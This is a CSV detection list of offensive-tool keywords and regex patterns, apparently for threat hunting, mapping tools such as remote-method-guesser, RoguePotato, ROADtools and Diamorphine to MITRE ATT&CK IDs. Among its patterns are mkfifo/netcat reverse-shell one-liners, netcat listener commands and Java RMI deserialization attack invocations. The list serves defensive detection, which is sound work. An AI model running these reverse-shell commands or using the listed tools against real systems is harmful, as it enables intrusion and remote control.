"*ridbrute_attack*",".{0,1000}ridbrute_attack.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*RIDHIJACK.ps1*",".{0,1000}RIDHIJACK\.ps1.{0,1000}","offensive_tool_keyword","RID-Hijacking","RID Hijacking Proof of Concept script by Kevin 
Joyce","T1174","TA0003","N/A","N/A","Persistence","https://github.com/STEALTHbits/RIDHijackingProofofConceptKJ","1","1","N/A","9","1","16","7","2018-10-30T15:00:03Z","2018-10-29T19:52:10Z" "*ridrelay*",".{0,1000}ridrelay.{0,1000}","offensive_tool_keyword","ridrelay","Quick and easy way to get domain usernames while on an internal network.","T1175 - T1553.002 - T1553.003","TA0003 - TA0008 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/skorov/ridrelay","1","0","N/A","N/A","4","376","58","2020-05-20T03:35:32Z","2018-04-14T22:10:01Z" "*ring04h#s5.go*",".{0,1000}ring04h\#s5\.go.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "*Ripemd-160.test-vectors.txt*",".{0,1000}Ripemd\-160\.test\-vectors\.txt.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*rkervella/CarbonMonoxide*",".{0,1000}rkervella\/CarbonMonoxide.{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - 
T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","22","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" "*rlwrap -cAr nc -lvnp *",".{0,1000}rlwrap\s\-cAr\snc\s\-lvnp\s.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*rlwrap nc -lvnp *",".{0,1000}rlwrap\snc\s\-lvnp\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | sh -i 2>&1 | nc *",".{0,1000}rm\s\/tmp\/f\;mkfifo\s\/tmp\/f\;cat\s\/tmp\/f\s\|\ssh\s\-i\s2\>\&1\s\|\snc\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc * >/tmp/f*",".{0,1000}rm\s\/tmp\/f\;mkfifo\s\/tmp\/f\;cat\s\/tmp\/f\|sh\s\-i\s2\>\&1\|nc\s.{0,1000}\s\>\/tmp\/f.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell 
Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|ncat -u * >/tmp/*",".{0,1000}rm\s\/tmp\/f\;mkfifo\s\/tmp\/f\;cat\s\/tmp\/f\|sh\s\-i\s2\>\&1\|ncat\s\-u\s.{0,1000}\s\>\/tmp\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*rm -f *.o dump_vdso test_payload*",".{0,1000}rm\s\-f\s.{0,1000}\.o\sdump_vdso\stest_payload.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/timwr/CVE-2016-5195","1","0","N/A","N/A","10","942","392","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z" "*rmg bind * jmxrmi --bind-objid *",".{0,1000}rmg\sbind\s.{0,1000}\sjmxrmi\s\-\-bind\-objid\s.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*rmg bind *127.0.0.1:*--localhost-bypass*",".{0,1000}rmg\sbind\s.{0,1000}127\.0\.0\.1\:.{0,1000}\-\-localhost\-bypass.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability
Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*rmg call * --plugin GenericPrint.jar*",".{0,1000}rmg\scall\s.{0,1000}\s\-\-plugin\sGenericPrint\.jar.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*rmg call * --signature * --bound-name plain-server*",".{0,1000}rmg\scall\s.{0,1000}\s\-\-signature\s.{0,1000}\s\-\-bound\-name\splain\-server.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*rmg codebase *http* --component *",".{0,1000}rmg\scodebase\s.{0,1000}http.{0,1000}\s\-\-component\s.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*rmg codebase *java.util.HashMap *--bound-name
legacy-service*",".{0,1000}rmg\scodebase\s.{0,1000}java\.util\.HashMap\s.{0,1000}\-\-bound\-name\slegacy\-service.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*rmg enum *",".{0,1000}rmg\senum\s.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*rmg guess * *",".{0,1000}rmg\sguess\s.{0,1000}\s.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*rmg known javax.management.remote.rmi.RMIServerImpl_Stub*",".{0,1000}rmg\sknown\sjavax\.management\.remote\.rmi\.RMIServerImpl_Stub.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability
Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*rmg listen * CommonsCollections*",".{0,1000}rmg\slisten\s.{0,1000}\sCommonsCollections.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*rmg listen 0.0.0.0 *",".{0,1000}rmg\slisten\s0\.0\.0\.0\s.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*rmg objid *[*",".{0,1000}rmg\sobjid\s.{0,1000}\[.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*rmg roguejmx *",".{0,1000}rmg\sroguejmx\s.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 -
TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*rmg scan *",".{0,1000}rmg\sscan\s.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*rmg scan * --ports *",".{0,1000}rmg\sscan\s.{0,1000}\s\-\-ports\s.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*rmg serial * AnTrinh * --component *",".{0,1000}rmg\sserial\s.{0,1000}\sAnTrinh\s.{0,1000}\s\-\-component\s.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*rmg serial *CommonsCollections*",".{0,1000}rmg\sserial\s.{0,1000}CommonsCollections.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security
vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*rmg-*-jar-with-dependencies.jar*",".{0,1000}rmg\-.{0,1000}\-jar\-with\-dependencies\.jar.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*rmg*--yso*",".{0,1000}rmg.{0,1000}\-\-yso.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*RMIRegistryExploit.java*",".{0,1000}RMIRegistryExploit\.java.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit.
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*rmmod diamorphine*",".{0,1000}rmmod\sdiamorphine.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","N/A","10","10","1664","407","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z" "*roadrecon plugin *",".{0,1000}roadrecon\splugin\s.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","0","N/A","N/A","10","1667","237","2024-05-01T14:35:20Z","2020-03-28T09:56:08Z" "*roadrecon*gather.py*",".{0,1000}roadrecon.{0,1000}gather\.py.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","0","N/A","N/A","10","1667","237","2024-05-01T14:35:20Z","2020-03-28T09:56:08Z" "*roadrecon.db*",".{0,1000}roadrecon\.db.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation 
tools","https://github.com/dirkjanm/ROADtools","1","1","N/A","N/A","10","1667","237","2024-05-01T14:35:20Z","2020-03-28T09:56:08Z" "*roadrecon/frontend*",".{0,1000}roadrecon\/frontend.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","1","N/A","N/A","10","1667","237","2024-05-01T14:35:20Z","2020-03-28T09:56:08Z" "*ROADtools.git*",".{0,1000}ROADtools\.git.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","1","N/A","N/A","10","1667","237","2024-05-01T14:35:20Z","2020-03-28T09:56:08Z" "*ROADtools-master*",".{0,1000}ROADtools\-master.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","1","N/A","N/A","10","1667","237","2024-05-01T14:35:20Z","2020-03-28T09:56:08Z" "*roastinthemiddle -i * -t * -u *.txt -g *",".{0,1000}roastinthemiddle\s\-i\s.{0,1000}\s\-t\s.{0,1000}\s\-u\s.{0,1000}\.txt\s\-g\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" 
"*robertdavidgraham/masscan*",".{0,1000}robertdavidgraham\/masscan.{0,1000}","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","1","N/A","N/A","10","22663","2991","2024-03-15T06:32:42Z","2013-07-28T05:35:33Z" "*RobustPentestMacro*",".{0,1000}RobustPentestMacro.{0,1000}","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2434","474","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z" "*ROCAVulnerabilityTester*",".{0,1000}ROCAVulnerabilityTester.{0,1000}","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*RocksDefaultRequestRocksDefaultRequestRocksDefaultRequestRocks*",".{0,1000}RocksDefaultRequestRocksDefaultRequestRocksDefaultRequestRocks.{0,1000}","offensive_tool_keyword","rsockstun","reverse socks tunneler with ntlm and proxy support","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/llkat/rsockstun","1","0","N/A","10","10","43","19","2022-08-09T09:25:50Z","2018-10-17T09:51:11Z" "*rockyou.txt.gz*",".{0,1000}rockyou\.txt\.gz.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and 
analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","334","40","2024-04-27T11:55:25Z","2020-11-23T19:21:06Z" "*rockyou.txt.gz*",".{0,1000}rockyou\.txt\.gz.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*rockyou-30000.*",".{0,1000}rockyou\-30000\..{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*RogueOxidResolver can be run locally on 127.0.0.1*",".{0,1000}RogueOxidResolver\scan\sbe\srun\slocally\son\s127\.0\.0\.1.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*RogueOxidResolver.cpp*",".{0,1000}RogueOxidResolver\.cpp.{0,1000}","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","10","960","122","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" "*RoguePotato.cpp*",".{0,1000}RoguePotato\.cpp.{0,1000}","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege 
Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","10","960","122","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" "*RoguePotato.exe*",".{0,1000}RoguePotato\.exe.{0,1000}","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","10","960","122","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" "*RoguePotato.sln*",".{0,1000}RoguePotato\.sln.{0,1000}","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","10","960","122","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" "*RoguePotato.zip*",".{0,1000}RoguePotato\.zip.{0,1000}","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","10","960","122","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" "*RoguePotato-master*",".{0,1000}RoguePotato\-master.{0,1000}","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","10","960","122","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" "*RogueSploit*",".{0,1000}RogueSploit.{0,1000}","offensive_tool_keyword","RogueSploit","RogueSploit is an open source automated script made to create a Fake Acces Point. with dhcpd server. dns spoofing. host redirection. 
browser_autopwn1 or autopwn2 or beef+mitmf","T1534 - T1565 - T1566 - T1573 - T1590","TA0001 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/h0nus/RogueSploit","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*RogueWinRM *",".{0,1000}RogueWinRM\s.{0,1000}","offensive_tool_keyword","RogueWinRM","RogueWinRM is a local privilege escalation exploit that allows to escalate from a Service account (with SeImpersonatePrivilege) to Local System account if WinRM service is not running","T1548.003 - T1134.002 - T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RogueWinRM","1","0","N/A","10","7","633","101","2020-02-23T19:26:41Z","2019-12-02T22:58:03Z" "*RogueWinRM dll.*",".{0,1000}RogueWinRM\sdll\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*RogueWinRM exe.*",".{0,1000}RogueWinRM\sexe\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. 
vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*RogueWinRM.c*",".{0,1000}RogueWinRM\.c.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
